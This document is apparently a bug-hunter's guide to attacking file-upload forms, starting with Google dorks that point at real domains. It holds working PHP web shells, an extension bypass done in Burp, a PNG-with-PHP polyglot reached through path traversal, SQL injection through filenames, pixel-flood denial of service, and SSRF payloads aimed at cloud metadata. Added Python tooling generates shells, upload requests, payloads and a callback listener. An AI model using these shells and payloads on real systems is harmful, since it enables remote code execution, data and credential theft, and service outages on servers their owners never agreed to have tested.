My Hunting Approach on File Upload

Google dorks for finding file upload forms

site:*.tesla.com | inurl:"uploadform"  intext:"choose file"
site:*.com inurl:"uploadform" 
site:*.com inurl:"uploadform" filetype:asp 

Check file upload to RCE:

Payload file: flozz/p0wny-shell on GitHub (single-file PHP shell)

  1. Upload a PHP file first (p0wny-shell, or a plain phpinfo() stub) and confirm that the server executes it rather than serving it back as text.

  2. Observe which of the PHP command-execution functions popen(), system(), shell_exec() and passthru() are disabled on this application (the disable_functions directive, visible in phpinfo() output) and which are still enabled.

  3. Craft the reverse shell payload around a function that is still enabled and save it as shell.php. If client-side validation rejects .php, name it shell.php.jpg to get past that check.

  4. Intercept the upload request in Burp Suite, remove the .jpg extension from the filename, and forward the request so the server stores shell.php.

Payload using the backtick execution operator (PHP's shorthand for shell_exec(); swap in popen(), system() or passthru() if that one is disabled):
---------
<?php
// $_GET['cmd'] goes straight to the shell; the backticks return its output
$cmd = $_GET['cmd'];
echo `$cmd`;
?>

/uploadform/uploads/shell.php?cmd=id
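The four steps above as an added Python example (not code from the original page or from p0wny-shell): it generates a PHP probe that reports which execution functions survive disable_functions, parses the probe's output, picks an enabled primitive, emits a matching one-line shell, and builds the multipart upload body with the .jpg suffix already stripped from the filename, which is what the Burp edit does by hand. The candidate list, the cmd parameter name and the form field name are this example's assumptions.

```python
# Added example, not from the page: probe disable_functions, pick a working
# execution primitive, and build the upload request with the real .php name.
import uuid
from typing import Dict, Optional, Tuple

# Candidate primitives in preference order (this example's list, not the page's).
CANDIDATES = ["system", "passthru", "shell_exec", "exec", "popen", "proc_open"]


def probe_php() -> str:
    """PHP to upload first: prints name=enabled|disabled per candidate.
    A function is unusable if it is in disable_functions or missing entirely."""
    names = ",".join(CANDIDATES)
    return (
        "<?php\n"
        "$disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));\n"
        f"foreach (explode(',', '{names}') as $f) {{\n"
        "  $ok = function_exists($f) && !in_array($f, $disabled, true);\n"
        "  echo $f, '=', ($ok ? 'enabled' : 'disabled'), \"\\n\";\n"
        "}\n"
    )


def parse_probe(output: str) -> Dict[str, bool]:
    """Turn the probe's name=state lines into {name: is_enabled}."""
    enabled: Dict[str, bool] = {}
    for line in output.splitlines():
        if "=" in line:
            name, state = line.strip().split("=", 1)
            enabled[name] = state == "enabled"
    return enabled


def pick_primitive(enabled: Dict[str, bool]) -> Optional[str]:
    """First candidate the probe reported as enabled, or None if all are blocked."""
    return next((n for n in CANDIDATES if enabled.get(n)), None)


def shell_php(primitive: str, param: str = "cmd") -> str:
    """One-line web shell built around the surviving primitive; the command
    arrives in ?cmd=... (parameter name is this example's choice)."""
    body = {
        "system": "system($c);",
        "passthru": "passthru($c);",
        "shell_exec": "echo shell_exec($c);",
        "exec": "exec($c, $o); echo implode(\"\\n\", $o);",
        "popen": "$p = popen($c, 'r'); while (!feof($p)) { echo fread($p, 4096); } pclose($p);",
        "proc_open": ("$p = proc_open($c, [1 => ['pipe', 'w']], $pipes); "
                      "echo stream_get_contents($pipes[1]); proc_close($p);"),
    }[primitive]
    return f"<?php $c = $_GET['{param}']; {body} ?>"


def strip_bypass_suffix(filename: str, suffix: str = ".jpg") -> str:
    """shell.php.jpg satisfies a client-side extension check; dropping the
    suffix in the intercepted request makes the server store shell.php."""
    return filename[:-len(suffix)] if filename.endswith(suffix) else filename


def multipart_body(field: str, filename: str, content: bytes,
                   content_type: str = "image/jpeg",
                   boundary: Optional[str] = None) -> Tuple[bytes, str]:
    """Build the multipart/form-data body as Burp would forward it: the image
    Content-Type from the browser's request is kept, the filename is already .php."""
    boundary = boundary or "----WebKitFormBoundary" + uuid.uuid4().hex[:16]
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail, f"multipart/form-data; boundary={boundary}"


if __name__ == "__main__":
    # Constructed probe output standing in for the real HTTP response.
    sample = "system=disabled\npassthru=enabled\nshell_exec=disabled\nexec=enabled\n"
    primitive = pick_primitive(parse_probe(sample))
    php = shell_php(primitive or "system").encode()
    body, ctype = multipart_body("file", strip_bypass_suffix("shell.php.jpg"), php)
    print(ctype)
    print(body.decode())
```

Upload probe_php() first, feed the response to parse_probe(), then send the multipart_body() output with the returned Content-Type header; if pick_primitive() returns None, every listed primitive is blocked and a different route (for example writing files with the PHP functions that remain) is needed.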

File upload and path traversal to RCE

Upload a PNG file through any attachment upload function, with PHP code appended after the image data. You can use the file png-transparent.png from the attachments: it is an empty (transparent) PNG with the following payload at its end:

<?php system("uname -a");?>

Then resend the request with Filename changed to the relative path of the uploaded file on the server's filesystem, so the application reads the PNG from that path and runs the PHP it carries:

Filename=../../../../application/files/9316/1312/5391/png-transparent.png

Reload the page and see the payload fire; the uname -a output shows up in the response. The appended code only runs when PHP interprets the file, so a PNG that is merely served back as an image proves nothing yet.


Check filename and SVG file upload for stored XSS:


File upload to SQL injection

We can test for SQLi through the filename by uploading a file named sleep(10)-- -.jpg. Time a normal upload first; if the upload with the payload name consistently takes about 10 seconds longer, the filename is reaching the database query unescaped and the application is vulnerable to SQLi. This payload only fires when the name is interpolated unquoted; if it lands inside a quoted string, a variant that closes the quote first is needed.
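An added Python helper for the timing check (example code, not from the page): it produces the page's filename payload plus quoted-context variants for MySQL and PostgreSQL (the variants are this example's assumptions about where the name lands in the query), shows how each lands in a naively interpolated INSERT, and decides from repeated timings whether a delay is real rather than network jitter. Plug your own upload function into assess().

```python
# Added example, not from the page: filename payloads for time-based SQLi
# and a timing decision that tolerates ordinary network jitter.
import statistics
import time
from typing import Callable, Dict, List


def sqli_filenames(seconds: float = 10, ext: str = ".jpg") -> Dict[str, str]:
    """The page's payload plus quoted-context variants (the variants are this
    example's assumptions about where the filename lands in the query)."""
    return {
        # Fires when the name is interpolated unquoted; -- - comments out the rest.
        "mysql-unquoted": f"sleep({seconds})-- -{ext}",
        # Closes a single-quoted string, evaluates SLEEP, reopens the string.
        "mysql-quoted": f"x'+(SELECT SLEEP({seconds}))+'{ext}",
        "postgres-quoted": f"x'||(SELECT 1 FROM pg_sleep({seconds}))||'{ext}",
    }


def naive_insert(filename: str) -> str:
    """Constructed illustration of a vulnerable handler that pastes the name
    into SQL text. With these quotes only the quoted variants break out; the
    page's payload needs the name to be interpolated without quotes."""
    return f"INSERT INTO uploads (name) VALUES ('{filename}')"


def timed(fn: Callable[[], object]) -> float:
    """Wall-clock seconds for one call."""
    start = time.perf_counter()
    fn()
    return time.perf_counter() - start


def is_delayed(baseline: List[float], injected: float, seconds: float,
               slack: float = 0.8) -> bool:
    """True when the injected upload exceeds the median baseline by at least
    slack*seconds, so a slow host alone cannot produce a false positive."""
    return injected - statistics.median(baseline) >= slack * seconds


def assess(upload: Callable[[str], object], seconds: float = 10,
           samples: int = 3) -> Dict[str, bool]:
    """Time a clean filename several times, then each payload once."""
    baseline = [timed(lambda: upload("clean.jpg")) for _ in range(samples)]
    return {label: is_delayed(baseline, timed(lambda: upload(name)), seconds)
            for label, name in sqli_filenames(seconds).items()}


def simulated_upload(name: str, delay: float = 0.3) -> None:
    """Stand-in target (constructed): only the unquoted payload reaches sleep()."""
    time.sleep(delay if name.startswith("sleep(") else 0.0)


if __name__ == "__main__":
    for label, name in sqli_filenames(10).items():
        print(label, "->", naive_insert(name))
    print(assess(simulated_upload, seconds=0.3))
```

Keep the sleep short on shared targets and repeat a positive result once with a different delay value (5 then 10 seconds) before reporting it; a delay that scales with the number you chose is the convincing evidence.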


Check upload for pixel flood attack:

  1. Download the pixel flood image file from here.

  2. Upload this image to the website you are testing.

  3. If the server times out while processing it, the server is vulnerable.

Or generate your own:

  1. Resize an image to 64250*64250 px, for example at https://www.resizepixel.com

  2. Observe the server's response after uploading the generated file.

  3. Confirm from another device whether the application is still reachable. If the server takes too long to respond or is inaccessible, its image decoder is allocating the full pixel buffer and the application may be vulnerable to pixel flood attacks.
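The png-transparent.png from the path traversal section above and the 64250*64250 pixel flood image are both ordinary PNGs, so this added Python example (not from the page) builds them from scratch: a valid all-zero PNG with an optional PHP trailer after IEND, a chunk walker that verifies CRCs and recovers the trailer, and a decoded_size() calculation showing why the large image hurts the decoder and not the uploader. The output filenames and the greyscale choice for the flood image are this example's assumptions.

```python
# Added example, not from the page: build the PNGs used by the path-traversal
# and pixel-flood checks and verify what a decoder would see in them.
import struct
import zlib
from typing import Iterator, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"
COLOUR_TYPE = {1: 0, 4: 6}            # channels -> PNG colour type (grey, RGBA)
CHANNELS = {0: 1, 2: 3, 4: 2, 6: 4}  # PNG colour type -> channels


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """length + type + data + CRC32 over type and data, as the spec requires."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_png(width: int, height: int, channels: int = 4, trailer: bytes = b"") -> bytes:
    """Valid 8-bit PNG of all-zero pixels (transparent black when RGBA) with
    `trailer` appended after IEND. Rows are streamed through zlib, so the
    64250x64250 case costs the decoder width*height*channels bytes, not us."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, COLOUR_TYPE[channels], 0, 0, 0)
    row = b"\x00" * (1 + width * channels)   # filter type 0 followed by zero pixels
    comp = zlib.compressobj(level=1)
    idat = bytearray()
    for _ in range(height):
        idat += comp.compress(row)
    idat += comp.flush()
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", bytes(idat))
            + _chunk(b"IEND", b"") + trailer)


def iter_chunks(data: bytes) -> Iterator[Tuple[bytes, bytes]]:
    """Walk the chunks, checking every CRC, and stop at IEND so an appended
    PHP trailer is never parsed as image data."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos = 8
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if crc != (zlib.crc32(ctype + body) & 0xFFFFFFFF):
            raise ValueError(f"bad CRC in {ctype!r}")
        yield ctype, body
        pos += 12 + length
        if ctype == b"IEND":
            break


def ihdr(data: bytes) -> Tuple[int, int, int]:
    """(width, height, channels) from the header chunk."""
    for ctype, body in iter_chunks(data):
        if ctype == b"IHDR":
            width, height = struct.unpack(">II", body[:8])
            return width, height, CHANNELS[body[9]]
    raise ValueError("no IHDR")


def decoded_size(data: bytes) -> int:
    """Bytes a decoder allocates for the raw pixel buffer: the pixel-flood number."""
    width, height, channels = ihdr(data)
    return width * height * channels


def raw_pixels(data: bytes) -> bytes:
    """Inflate all IDAT chunks (filter bytes included), as a decoder would."""
    return zlib.decompress(b"".join(b for t, b in iter_chunks(data) if t == b"IDAT"))


def trailer(data: bytes) -> bytes:
    """Everything after IEND, i.e. the embedded PHP."""
    end = 8 + sum(12 + len(body) for _, body in iter_chunks(data))
    return data[end:]


if __name__ == "__main__":
    php = b'<?php system("uname -a");?>'
    with open("png-transparent.png", "wb") as f:         # 1x1 transparent + PHP
        f.write(make_png(1, 1, channels=4, trailer=php))
    # 64250x64250 greyscale: a few MB on disk, ~4 GiB once decoded (RGBA ~16 GiB).
    # Generating it streams ~4 GB through zlib, so it takes a little while.
    with open("flood.png", "wb") as f:
        f.write(make_png(64250, 64250, channels=1))
    print(decoded_size(open("flood.png", "rb").read()))
```

Because the trailer sits after IEND, image libraries that re-encode uploads (thumbnailers, EXIF strippers) silently drop it; if the traversal step fails, check whether the stored file still ends with the PHP before blaming the include path.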


File upload to SSRF:

Server-Side Request Forgery through a file upload function that accepts HTML or SVG files, a fetch-by-URL option, or any component that parses the uploaded file server-side. Depending on the situation the SSRF may reach internal hosts, a cloud metadata service, or only external targets. Confirm the fetch with an out-of-band callback to a host you control before aiming at metadata: the GCP endpoint below only answers requests carrying the Metadata-Flavor: Google header, which a rendered iframe cannot add, so an empty result there does not rule out SSRF.

Malicious code:
<body>
<iframe src="http://169.254.169.254/computeMetadata/v1/" width="500" height="500"></iframe>
</body>
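Added Python example (not from the page) covering the stored-XSS section's SVG and filename payloads and this section's SVG and HTML payloads, plus a throwaway HTTP listener that records out-of-band hits; use it to confirm the upload is fetched server-side before pointing the payload at a metadata service. The listener port, the alert(document.domain) probe and the idea that you expose the listener to the target yourself are this example's assumptions.

```python
# Added example, not from the page: SVG/HTML payloads for the stored-XSS and
# SSRF checks, plus a local listener that records out-of-band callbacks.
import html
import http.server
import threading
import urllib.request
import xml.etree.ElementTree as ET
from typing import List, Tuple

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"


def svg_xss(probe: str = "document.domain") -> str:
    """SVG that runs script when opened directly or rendered inline; the
    alert shows which origin serves the upload (probe is this example's choice)."""
    return (f'<svg xmlns="{SVG_NS}" width="1" height="1" onload="alert({probe})">'
            f"<script>alert({probe})</script></svg>")


def xss_filename(ext: str = ".jpg") -> str:
    """Filename for a listing or error page that echoes the name unescaped."""
    return f'"><img src=x onerror=alert(document.domain)>{ext}'


def svg_ssrf(url: str) -> str:
    """Server-side renderers (thumbnailers, PDF/image converters) fetch the
    referenced image; the URL is attribute-escaped so & survives XML parsing."""
    href = html.escape(url, quote=True)
    return (f'<svg xmlns="{SVG_NS}" xmlns:xlink="{XLINK_NS}" width="100" height="100">'
            f'<image xlink:href="{href}" width="100" height="100"/></svg>')


def html_ssrf(url: str) -> str:
    """The page's iframe payload with the target URL as a parameter."""
    return (f'<html><body><iframe src="{html.escape(url, quote=True)}" '
            'width="500" height="500"></iframe></body></html>')


def is_valid_svg(doc: str) -> bool:
    """Reject payloads a strict XML parser would drop before rendering."""
    try:
        return ET.fromstring(doc).tag == f"{{{SVG_NS}}}svg"
    except ET.ParseError:
        return False


class _Handler(http.server.BaseHTTPRequestHandler):
    def do_GET(self) -> None:
        self.server.hits.append((self.client_address[0], self.path,
                                 self.headers.get("User-Agent", "")))
        self.send_response(200)
        self.send_header("Content-Type", "image/png")
        self.end_headers()

    def log_message(self, *args) -> None:   # keep the console quiet
        pass


class CallbackListener:
    """Throwaway Collaborator-style listener. Bound to 127.0.0.1 here; the
    assumption is that you expose it to the target (VPS, tunnel) in practice."""

    def __init__(self, host: str = "127.0.0.1", port: int = 0) -> None:
        self.server = http.server.HTTPServer((host, port), _Handler)
        self.server.hits = []  # list of (client_ip, path, user_agent)
        self._thread = threading.Thread(target=self.server.serve_forever, daemon=True)

    def __enter__(self) -> "CallbackListener":
        self._thread.start()
        return self

    def __exit__(self, *exc) -> None:
        self.server.shutdown()
        self.server.server_close()

    @property
    def url(self) -> str:
        host, port = self.server.server_address[:2]
        return f"http://{host}:{port}"

    @property
    def hits(self) -> List[Tuple[str, str, str]]:
        return self.server.hits


def fetch(url: str) -> int:
    """Tiny client used to smoke-test the listener (the target plays this role)."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.status


if __name__ == "__main__":
    with CallbackListener() as cb:
        print(svg_ssrf(cb.url + "/ssrf-check.png"))
        print(html_ssrf("http://169.254.169.254/computeMetadata/v1/"))
        fetch(cb.url + "/ssrf-check.png")       # stands in for the target's fetch
        print("hits:", cb.hits)
```

The User-Agent recorded in each hit tells you what fetched the file (a headless browser, an image library, a PDF converter), which in turn tells you whether the iframe or the SVG image reference is the right vehicle for the metadata request.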
